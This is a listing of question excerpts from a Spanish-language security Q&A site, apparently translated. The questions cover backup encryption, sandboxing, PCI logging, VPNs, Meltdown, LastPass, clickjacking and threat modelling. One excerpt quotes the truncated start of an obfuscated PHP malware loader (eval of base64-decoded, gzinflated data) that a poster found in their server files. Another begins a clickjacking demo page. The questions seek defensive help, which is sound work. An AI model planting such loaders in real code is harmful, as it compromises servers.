Todas las preguntas

1
respuesta

código PHP malvado Necesito ayuda para analizar

Encontré en mi servidor algo como esto al principio de mis archivos php: <?php eval(gzinflate(base64_decode('lVltc9pIEv7MVd1/UCjFSDEGSYBtYstONnF2t+qyyRFyVVdxlhrECLQWklYSBGLlv9/TPRLIb3d7qQSGme6efu+eTuBrxrOZ9INIzoyWny7fZi3TvP373xpqs9rT2rZ5hl2...
pregunta 26.11.2014 - 14:27
2
respuestas

Razones para cifrar los nombres de archivos en la copia de seguridad en la nube

Utilizo un servicio en la nube para mi copia de seguridad fuera del sitio, y todos mis archivos están cifrados. Pero me pregunto si habilitar el cifrado de nombre de archivo o no. ¿Se pueden obtener ventajas de seguridad al cifrar también los no...
pregunta 28.12.2014 - 00:13
2
respuestas

Ejecutando un código Python no confiable

Tengo un pequeño enrutador OpenWRT, en el que deseo ejecutar un demonio que es un script de Python. Sin embargo, aunque es de código abierto y simple de Python, todavía no confío en él y me gustaría aislarlo del resto del sistema tanto como sea...
pregunta 01.01.2015 - 14:38
1
respuesta

Para el cumplimiento de PCI, ¿es necesario registrar cada solicitud independientemente de cómo afecte el rendimiento del sistema?

Nuestro servicio basado en la nube está experimentando cambios con vistas al cumplimiento de PCI. Es un servicio de alto rendimiento, y existe la preocupación de que habilitar la cantidad correcta de registro en nuestra aplicación de servidor...
pregunta 15.12.2014 - 15:26
2
respuestas

¿Es seguro proporcionar a otros un servidor VPN en casa?

Estoy tratando de configurar un servidor VPN en una Raspberry Pi en casa para ayudar a algunos amigos que viven en un país donde Internet está muy filtrado. Hasta ahora he encontrado OpenVPN y PiVPN para este propósito. Sin embargo, estoy preocu...
pregunta 03.01.2018 - 22:32
2
respuestas

¿Cómo accede realmente el canal lateral a los contenidos de la memoria del kernel en Meltdown?

En el documento Meltdown, menciona que puede identificar la dirección de memoria del kernel a la que se accede. La parte que no entiendo es cómo funciona el canal FLUSH + RELOAD para identificar cuál es el contenido de la dirección de memoria en...
pregunta 11.01.2018 - 12:36
1
respuesta

¿Cómo descifra LastPass las contraseñas?

Soy un desarrollador web, no un experto en seguridad, pero sé un poco sobre seguridad porque lo necesito como desarrollador web. Según LastPass,    LastPass encripta tu bóveda antes de que vaya al servidor usando   Encriptación AES de 256...
pregunta 30.11.2017 - 10:35
1
respuesta

¿Cómo puede la policía obtener el historial de búsqueda de alguien?

A veces veo artículos de noticias que dicen que alguien fue sospechoso de un delito, por lo que la policía obtuvo su historial de búsqueda y encontró varios términos de búsqueda en Google, etc. ¿Cuáles son las posibles formas en que pueden ha...
pregunta 23.04.2018 - 03:29
1
respuesta

¿Cómo robar el código fuente a través de clickjacking?

¿Es posible robar el código fuente a través de clickjacking, para que el atacante también pueda robar los tokens CSRF? Este es un sitio web de ataque de demostración: <!DOCTYPE html> <html> </div> <div draggable="true"...
pregunta 28.01.2018 - 11:47
3
respuestas

¿Es un modelo de amenaza totalmente subjetivo o puede basarse en pautas objetivas?

Todos sabemos que en el campo de la seguridad todo depende del modelo de amenaza, lo que básicamente significa que necesita definir de quién o qué está protegiendo. ¿Pero quién debería decidir esto, y sobre qué base objetiva? Dado que no puede p...
pregunta 22.04.2018 - 22:48